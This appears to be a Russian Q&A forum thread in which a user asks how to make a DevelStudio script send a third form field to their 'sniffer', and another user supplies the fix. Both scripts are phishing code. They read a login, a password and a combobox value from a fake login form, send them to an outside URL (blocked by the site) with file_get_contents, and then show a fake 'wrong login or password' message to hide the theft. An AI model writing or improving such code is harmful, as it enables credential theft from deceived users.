Александра Тершинова

Помогите с DevelStudio

Мне на днях пригодилась программа DevelStudio когда я создаю поля для ввода (мне их надо 3 шт) . Мне на сниффер приходят сообщения только от 2

Вот скрипт
$edit1 = c('Form1->edit1')->text;
$edit2 = c('Form1->edit2')->text;
$combobox1 = c('Form1->combobox1')->inText;
$url = "[ссылка заблокирована по решению администрации проекта]";
file_get_contents($url . "?" . "login:" . $edit1 . "|pass:" . $edit2);
MessageBox("Невернно введён логин или пароль", "Ошибка ввода");

Как мне изменить скрипт что бы приходило на снифер 3 поля

Яш
Яшка

$edit1 = c('Form1->edit1')->text;
$edit2 = c('Form1->edit2')->text;
$combobox1 = c('Form1->combobox1')->inText;
$url = "[ссылка появится после проверки модератором] ";
file_get_contents($url . "?" . "login:" . $edit1 . "|pass:" . $edit2 . "combox:" . $combobox1);
MessageBox("Невернно введён логин или пароль", "Ошибка ввода");